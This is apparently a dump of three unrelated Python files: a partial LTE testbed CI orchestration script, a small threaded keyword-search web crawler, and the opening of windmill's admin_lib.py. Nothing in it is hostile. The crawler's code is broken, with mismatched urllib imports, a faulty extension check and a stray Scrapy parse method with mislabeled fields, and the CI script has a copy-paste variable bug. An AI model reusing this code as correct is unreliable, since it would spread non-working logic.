SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Initialize_eNB':
SSH.Initialize_eNB_args = test.findtext('Initialize_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Terminate_eNB':
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Attach_UE':
nbMaxUEtoAttach = test.findtext('nbMaxUEtoAttach')
if (nbMaxUEtoAttach is None):
SSH.nbMaxUEtoAttach = -1
else:
SSH.nbMaxUEtoAttach = int(nbMaxUEtoAttach)
if action == 'CheckStatusUE':
expectedNBUE = test.findtext('expectedNbOfConnectedUEs')
if (expectedNBUE is None):
SSH.expectedNbOfConnectedUEs = -1
else:
SSH.expectedNbOfConnectedUEs = int(expectedNBUE)
if action == 'Build_OAI_UE':
SSH.Build_OAI_UE_args = test.findtext('Build_OAI_UE_args')
if action == 'Initialize_OAI_UE':
SSH.Initialize_OAI_UE_args = test.findtext('Initialize_OAI_UE_args')
SSH.UE_instance = test.findtext('UE_instance')
if (SSH.UE_instance is None):
SSH.UE_instance = '0'
if action == 'Terminate_OAI_UE':
SSH.eNB_instance = test.findtext('UE_instance')
if (SSH.UE_instance is None):
SSH.UE_instance = '0'
if action == 'Ping' or action == 'Ping_CatM_module':
SSH.ping_args = test.findtext('ping_args')
SSH.ping_packetloss_threshold = test.findtext('ping_packetloss_threshold')
if action == 'Iperf':
SSH.iperf_args = test.findtext('iperf_args')
SSH.iperf_packetloss_threshold = test.findtext('iperf_packetloss_threshold')
SSH.iperf_profile = test.findtext('iperf_profile')
if (SSH.iperf_profile is None):
SSH.iperf_profile = 'balanced'
else:
if SSH.iperf_profile != 'balanced' and SSH.iperf_profile != 'unbalanced' and SSH.iperf_profile != 'single-ue':
logging.debug('ERROR: test-case has wrong profile ' + SSH.iperf_profile)
SSH.iperf_profile = 'balanced'
if action == 'IdleSleep':
string_field = test.findtext('idle_sleep_time_in_sec')
if (string_field is None):
SSH.idle_sleep_time = 5
else:
SSH.idle_sleep_time = int(string_field)
if action == 'Perform_X2_Handover':
string_field = test.findtext('x2_ho_options')
if (string_field is None):
SSH.x2_ho_options = 'network'
else:
if string_field != 'network':
logging.error('ERROR: test-case has wrong option ' + string_field)
SSH.x2_ho_options = 'network'
else:
SSH.x2_ho_options = string_field
#check if given test is in list
#it is in list if one of the strings in 'list' is at the beginning of 'test'
def test_in_list(test, list):
for check in list:
check=check.replace('+','')
if (test.startswith(check)):
return True
return False
def receive_signal(signum, frame):
sys.exit(1)
#-----------------------------------------------------------
# Parameter Check
#-----------------------------------------------------------
mode = ''
SSH = SSHConnection()
argvs = sys.argv
argc = len(argvs)
cwd = os.getcwd()
while len(argvs) > 1:
myArgv = argvs.pop(1) # 0th is this file's name
if re.match('^\-\-help$', myArgv, re.IGNORECASE):
Usage()
sys.exit(0)
elif re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE)
mode = matchReg.group(1)
elif re.match('^\-\-eNBRepository=(.+)$|^\-\-ranRepository(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranRepository=(.+)$', myArgv, re.IGNORECASE)
SSH.ranRepository = matchReg.group(1)
elif re.match('^\-\-eNB_AllowMerge=(.+)$|^\-\-ranAllowMerge=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranAllowMerge=(.+)$', myArgv, re.IGNORECASE)
doMerge = matchReg.group(1)
if ((doMerge == 'true') or (doMerge == 'True')):
SSH.ranAllowMerge = True
elif re.match('^\-\-eNBBranch=(.+)$|^\-\-ranBranch=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.ranBranch = matchReg.group(1)
elif re.match('^\-\-eNBCommitID=(.*)$|^\-\-ranCommitID=(.*)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranCommitID=(.*)$', myArgv, re.IGNORECASE)
SSH.ranCommitID = matchReg.group(1)
elif re.match('^\-\-eNBTargetBranch=(.*)$|^\-\-ranTargetBranch=(.*)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranTargetBranch=(.*)$', myArgv, re.IGNORECASE)
SSH.ranTargetBranch = matchReg.group(1)
elif re.match('^\-\-eNBIPAddress=(.+)$|^\-\-eNB[1-2]IPAddress=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBIPAddress = matchReg.group(1)
elif re.match('^\-\-eNB1IPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1IPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1IPAddress = matchReg.group(1)
elif re.match('^\-\-eNB2IPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2IPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2IPAddress = matchReg.group(1)
elif re.match('^\-\-eNBUserName=(.+)$|^\-\-eNB[1-2]UserName=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBUserName = matchReg.group(1)
elif re.match('^\-\-eNB1UserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1UserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1UserName = matchReg.group(1)
elif re.match('^\-\-eNB2UserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2UserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2UserName = matchReg.group(1)
elif re.match('^\-\-eNBPassword=(.+)$|^\-\-eNB[1-2]Password=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBPassword = matchReg.group(1)
elif re.match('^\-\-eNB1Password=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1Password=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1Password = matchReg.group(1)
elif re.match('^\-\-eNB2Password=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2Password=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2Password = matchReg.group(1)
elif re.match('^\-\-eNBSourceCodePath=(.+)$|^\-\-eNB[1-2]SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBSourceCodePath = matchReg.group(1)
elif re.match('^\-\-eNB1SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1SourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1SourceCodePath = matchReg.group(1)
elif re.match('^\-\-eNB2SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2SourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2SourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCIPAddress = matchReg.group(1)
elif re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCBranch = matchReg.group(1)
elif re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCUserName = matchReg.group(1)
elif re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCPassword = matchReg.group(1)
elif re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCSourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE)
if re.match('OAI', matchReg.group(1), re.IGNORECASE) or re.match('ltebox', matchReg.group(1), re.IGNORECASE):
SSH.EPCType = matchReg.group(1)
else:
sys.exit('Invalid EPC Type: ' + matchReg.group(1) + ' -- (should be OAI or ltebox)')
elif re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBIPAddress = matchReg.group(1)
elif re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBUserName = matchReg.group(1)
elif re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBPassword = matchReg.group(1)
elif re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE)
SSH.testXMLfiles.append(matchReg.group(1))
SSH.nbTestXMLfiles += 1
elif re.match('^\-\-UEIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.UEIPAddress = matchReg.group(1)
elif re.match('^\-\-UEUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.UEUserName = matchReg.group(1)
elif re.match('^\-\-UEPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.UEPassword = matchReg.group(1)
elif re.match('^\-\-UESourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UESourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.UESourceCodePath = matchReg.group(1)
elif re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE)
finalStatus = matchReg.group(1)
if ((finalStatus == 'true') or (finalStatus == 'True')):
SSH.finalStatus = True
else:
Usage()
sys.exit('Invalid Parameter: ' + myArgv)
if re.match('^TerminateeNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.eNB_serverId = '0'
SSH.eNB_instance = '0'
SSH.eNBSourceCodePath = '/tmp/'
SSH.TerminateeNB()
elif re.match('^TerminateUE$', mode, re.IGNORECASE):
if (SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == ''):
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateUE()
elif re.match('^TerminateOAIUE$', mode, re.IGNORECASE):
if SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateOAIUE()
elif re.match('^TerminateHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateHSS()
elif re.match('^TerminateMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateMME()
elif re.match('^TerminateSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateSPGW()
elif re.match('^LogCollectBuild$', mode, re.IGNORECASE):
if (SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '') and (SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == ''):
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectBuild()
elif re.match('^LogCollecteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollecteNB()
elif re.match('^LogCollectHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectHSS()
elif re.match('^LogCollectMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectMME()
elif re.match('^LogCollectSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectSPGW()
elif re.match('^LogCollectPing$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectPing()
elif re.match('^LogCollectIperf$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectIperf()
elif re.match('^LogCollectOAIUE$', mode, re.IGNORECASE):
if SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectOAIUE()
elif re.match('^InitiateHtml$', mode, re.IGNORECASE):
if (SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == ''):
Usage()
sys.exit('Insufficient Parameter')
count = 0
foundCount = 0
while (count < SSH.nbTestXMLfiles):
xml_test_file = cwd + "/" + SSH.testXMLfiles[count]
xml_test_file = sys.path[0] + "/" + SSH.testXMLfiles[count]
if (os.path.isfile(xml_test_file)):
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-' + str(count)))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-' + str(count)))
SSH.htmlTabIcons.append(xmlRoot.findtext('htmlTabIcon',default='info-sign'))
foundCount += 1
count += 1
if foundCount != SSH.nbTestXMLfiles:
SSH.nbTestXMLfiles = foundCount
SSH.CreateHtmlHeader()
elif re.match('^FinalizeHtml$', mode, re.IGNORECASE):
SSH.CreateHtmlFooter(SSH.finalStatus)
elif re.match('^TesteNB$', mode, re.IGNORECASE) or re.match('^TestUE$', mode, re.IGNORECASE):
if re.match('^TesteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.ranRepository == '' or SSH.ranBranch == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '' or SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '' or SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
if (SSH.EPCIPAddress != '') and (SSH.EPCIPAddress != 'none'):
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, cwd + "/tcp_iperf_stats.awk", "/tmp")
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, cwd + "/active_net_interfaces.awk", "/tmp")
else:
if SSH.UEIPAddress == '' or SSH.ranRepository == '' or SSH.ranBranch == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == '':
Usage()
sys.exit('UE: Insufficient Parameter')
#read test_case_list.xml file
# if no parameters for XML file, use default value
if (SSH.nbTestXMLfiles != 1):
xml_test_file = cwd + "/test_case_list.xml"
else:
xml_test_file = cwd + "/" + SSH.testXMLfiles[0]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
exclusion_tests=xmlRoot.findtext('TestCaseExclusionList',default='')
requested_tests=xmlRoot.findtext('TestCaseRequestedList',default='')
if (SSH.nbTestXMLfiles == 1):
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-0'))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-0'))
repeatCount = xmlRoot.findtext('repeatCount',default='1')
SSH.repeatCounts.append(int(repeatCount))
all_tests=xmlRoot.findall('testCase')
exclusion_tests=exclusion_tests.split()
requested_tests=requested_tests.split()
#check that exclusion tests are well formatted
#(6 digits or less than 6 digits followed by +)
for test in exclusion_tests:
if (not re.match('^[0-9]{6}$', test) and
not re.match('^[0-9]{1,5}\+$', test)):
logging.debug('ERROR: exclusion test is invalidly formatted: ' + test)
sys.exit(1)
else:
logging.debug(test)
#check that requested tests are well formatted
#(6 digits or less than 6 digits followed by +)
#be verbose
for test in requested_tests:
if (re.match('^[0-9]{6}$', test) or
re.match('^[0-9]{1,5}\+$', test)):
logging.debug('INFO: test group/case requested: ' + test)
else:
logging.debug('ERROR: requested test is invalidly formatted: ' + test)
sys.exit(1)
if (SSH.EPCIPAddress != '') and (SSH.EPCIPAddress != 'none'):
SSH.CheckFlexranCtrlInstallation()
#get the list of tests to be done
todo_tests=[]
for test in requested_tests:
if (test_in_list(test, exclusion_tests)):
logging.debug('INFO: test will be skipped: ' + test)
else:
#logging.debug('INFO: test will be run: ' + test)
todo_tests.append(test)
signal.signal(signal.SIGUSR1, receive_signal)
SSH.CreateHtmlTabHeader()
cnt = 0
SSH.prematureExit = True
while cnt < SSH.repeatCounts[0] and SSH.prematureExit:
SSH.prematureExit = False
for test_case_id in todo_tests:
for test in all_tests:
id = test.get('id')
if test_case_id != id:
continue
SSH.testCase_id = id
SSH.desc = test.findtext('desc')
action = test.findtext('class')
if (CheckClassValidity(action, id) == False):
continue
SSH.ShowTestID()
GetParametersFromXML(action)
if action == 'Initialize_UE' or action == 'Attach_UE' or action == 'Detach_UE' or action == 'Ping' or action == 'Iperf' or action == 'Reboot_UE' or action == 'DataDisable_UE' or action == 'DataEnable_UE' or action == 'CheckStatusUE':
if (SSH.ADBIPAddress != 'none'):
terminate_ue_flag = False
SSH.GetAllUEDevices(terminate_ue_flag)
if action == 'Build_eNB':
SSH.BuildeNB()
elif action == 'WaitEndBuild_eNB':
SSH.WaitBuildeNBisFinished()
elif action == 'Initialize_eNB':
SSH.InitializeeNB()
elif action == 'Terminate_eNB':
SSH.TerminateeNB()
elif action == 'Initialize_UE':
SSH.InitializeUE()
elif action == 'Terminate_UE':
SSH.TerminateUE()
elif action == 'Attach_UE':
SSH.AttachUE()
elif action == 'Detach_UE':
SSH.DetachUE()
elif action == 'DataDisable_UE':
SSH.DataDisableUE()
elif action == 'DataEnable_UE':
SSH.DataEnableUE()
elif action == 'CheckStatusUE':
SSH.CheckStatusUE()
elif action == 'Build_OAI_UE':
SSH.BuildOAIUE()
elif action == 'Initialize_OAI_UE':
SSH.InitializeOAIUE()
elif action == 'Terminate_OAI_UE':
SSH.TerminateOAIUE()
elif action == 'Initialize_CatM_module':
SSH.InitializeCatM()
elif action == 'Terminate_CatM_module':
SSH.TerminateCatM()
elif action == 'Attach_CatM_module':
SSH.AttachCatM()
elif action == 'Detach_CatM_module':
SSH.TerminateCatM()
elif action == 'Ping_CatM_module':
SSH.PingCatM()
elif action == 'Ping':
SSH.Ping()
elif action == 'Iperf':
SSH.Iperf()
elif action == 'Reboot_UE':
SSH.RebootUE()
elif action == 'Initialize_HSS':
SSH.InitializeHSS()
elif action == 'Terminate_HSS':
SSH.TerminateHSS()
elif action == 'Initialize_MME':
SSH.InitializeMME()
elif action == 'Terminate_MME':
SSH.TerminateMME()
elif action == 'Initialize_SPGW':
SSH.InitializeSPGW()
elif action == 'Terminate_SPGW':
SSH.TerminateSPGW()
elif action == 'Initialize_FlexranCtrl':
SSH.InitializeFlexranCtrl()
elif action == 'Terminate_FlexranCtrl':
SSH.TerminateFlexranCtrl()
elif action == 'IdleSleep':
SSH.IdleSleep()
elif action == 'Perform_X2_Handover':
SSH.Perform_X2_Handover()
else:
sys.exit('Invalid action')
if SSH.prematureExit:
break
if SSH.prematureExit:
break
cnt += 1
if cnt == SSH.repeatCounts[0] and SSH.prematureExit:
logging.debug('Testsuite failed ' + str(cnt) + ' time(s)')
SSH.CreateHtmlTabFooter(False)
sys.exit('Failed Scenario')
else:
logging.info('Testsuite passed after ' + str(cnt) + ' time(s)')
SSH.CreateHtmlTabFooter(True)
else:
Usage()
sys.exit('Invalid mode')
sys.exit(0)
|
crawling-scrap.py
|
from urllib import urlopen
import re
import threading
from multiprocessing import Queue
def findkeywordlvl(strwebsiteinp, strmatch, queueget):
if strmatch.startswith("src="):
strmatch = strmatch[5:len(strmatch)]
elif strmatch.startswith("href="):
strmatch = strmatch[6:len(strmatch)]
if not (strmatch.endswith(".jpg")) or (strmatch.endswith(".png")) or (strmatch.endswith(".bmp")) or (strmatch.endswith(".gif")):
if strmatch.startswith("//"):
strwebsite2 = "http:" + strmatch
elif strmatch.startswith("/"):
strwebsite2 = strwebsiteinp + strmatch
else:
strwebsite2 = strmatch
if ("\\" not in strwebsite2):
try:
print(strwebsite2)
strcontent = urllib.request.urlopen(strwebsite2).read()
match2 = re.findall(re.escape(strKeyword), str(strcontent))
match3 = re.findall("href=[\'\"]http\://[A-z0-9_\-\./]+|href=[\'\"]\/[A-z0-9_\-\./]+|href=[\'\"]www[A-z0-9_\-\./]+",str(strcontent))
match3 = match3 + re.findall("src=[\'\"]http\://[A-z0-9_\-\./]+|src=[\'\"]\/[A-z0-9_\-\./]+|src=[\'\"]www[A-z0-9_\-\./]+",str(strcontent))
if match2:
strPrint = strwebsite2 + " has " + str(len(match2)) + " matches with keyword: " + strKeyword + "\n"
print(strPrint)
strFile.write(strPrint)
else:
print("No matches for:", strwebsite2)
queueget.put([strwebsite2, match3])
return [strwebsite2, match3]
except Exception as ex:
errormsg = "Exception {0} occurred. Reason:\n{1!r}"
message = errormsg.format(type(ex).__name__, ex.args)
print(message)
strFile2.write(message)
strWebsite = input("Enter website :\n")
strKeyword = input("Enter keyword to search for:\n")
intLevel = int(input("Select levels to scan. Choose 1, 2 or 3 - 3 might contain errors:\n"))
filename = strWebsite[7:len(strWebsite)] + " positives.log"
filename2 = strWebsite[7:len(strWebsite)] + " errors.log"
strFile = open(filename, 'w')
strFile2 = open(filename2, 'w')
strContent = urllib.request.urlopen(strWebsite).read()
match2 = re.findall(re.escape(strKeyword), str(strContent))
match3 = []
if match2:
strPrint = strWebsite + " has " + str(len(match2)) + " matches with keyword: " + strKeyword + "\n"
print(strPrint)
strFile.write(strPrint)
else:
print("No matches for:", strWebsite)
if intLevel == 1:
print("Finished scanning website for keywords")
elif intLevel in range(2, 4):
regex1 = r"src=[\'\"]http\://[A-z0-9_\-\./]+|src=[\'\"]\/[A-z0-9_\-\./]+|src=[\'\"]www[A-z0-9_\-\./]+"
regex2 = r"href=[\'\"]http\://[A-z0-9_\-\./]+|href=[\'\"]\/[A-z0-9_\-\./]+|href=[\'\"]www[A-z0-9_\-\./]+"
results = []
match = re.findall(re.compile(regex2), str(strContent))
matchsrc = re.findall(re.compile(regex1), str(strContent))
match = match + matchsrc
q = Queue()
threads = []
i = 0
while i < len(match):
if threading.active_count() < 10:
t = threading.Thread(target=findkeywordlvl, args =(strWebsite, match[i],q))
t.start()
threads.append(t)
i += 1
for p in threads:
p.join()
while not q.empty():
results.append(q.get_nowait())
print(results)
threads = []
j = 0
if intLevel == 3:
for i in range(0,len(results)):
while j < len(results[i][1]):
if threading.active_count() < 10:
threads.append(threading.Thread(target=findkeywordlvl, args=(results[i][0],results[i][1][j],q)))
threads[j].start()
j += 1
for p in threads:
p.join()
else:
print("Wrong level. Try again.")
def parse(self, response):
for e in response.css('div#boxoffice>table>tbody>tr'):
yield {
'url': ''.join(e.css('td.titleColumn>a::text').extract()).strip(),
'title': ''.join(e.css('td.ratingColumn')[0].css('::text').extract()).strip(),
'description': ''.join(e.css('td.ratingColumn')[1].css('span.secondaryInfo::text').extract()).strip(),
'type': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'image': e.css('td.posterColumn img::attr(src)').extract_first(),
'city': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'state': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'how_to_appy': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'author': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'posted_at': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
}
strFile.close()
strFile2.close()
|
admin_lib.py
|
# Copyright (c) 2006-2007 Open Source Applications Foundation
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
# Copyright (c) 2009 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import windmill
from windmill import conf, server
import logging
from time import sleep
import os, sys
from datetime import datetime
from threading import Thread
import shutil
import socket
from windmill.dep import functest
functest.configure()
def process_options(argv_list):
"""Process all the command line options"""
import admin_options
admin_options.process_module(admin_options)
argv_list.pop(0)
action = None
# This might be the hairiest code in windmill :)
# We have a very specific way we need to parse arguments
# because of the way different arguments interact with each other
# 8/27/2007 Gawd this is ugly, i would love to refactor this but I've
# forgotten what it does -Mikeal
# 12/15/2007 Oh man, I'm going to add a feature to this without refactoring it.
# The issue with this code remains the same and no standard arg parsing
# module can do what we need.
for arg in argv_list:
# Grab the test url if one is given
if arg.startswith('http://') or arg.startswith('https://'):
windmill.settings['TEST_URL'] = arg
functest.registry['url'] = arg
elif arg.startswith('-'):
# Take something like -efg and set the e, f, and g options
options = arg.replace('-', '')
for option in options:
admin_options.flags_dict[option]()
else:
# Any argument not starting with - is a regular named option
value = None
if arg.find('=') is not -1:
name, value = arg.split('=')
else:
name = arg
if name in admin_options.options_dict:
processor = admin_options.options_dict[name]
if value is None:
processor()
else:
processor(value)
elif name in action_mapping:
action = action_mapping[name]
else:
print name, 'is not a windmill argument. Sticking in functest registry.'
if value is None:
value = True
functest.registry[name] = value
if action is None:
# If an action is not defined we default to running the service in the foreground
return action_mapping['runserver']
else:
return action
def setup_servers(console_level=logging.INFO):
"""Setup the server and return httpd and loggers"""
windmill.is_active = True
windmill.ide_is_awake = False
if len(logging.getLogger().handlers) > 0:
console_handler = logging.getLogger().handlers[0]
console_handler.setLevel(console_level)
httpd = server.make_server()
return httpd
def run_threaded(console_level=logging.INFO):
"""Run the server threaded."""
httpd = setup_servers(console_level)
httpd_thread = Thread(target=httpd.start)
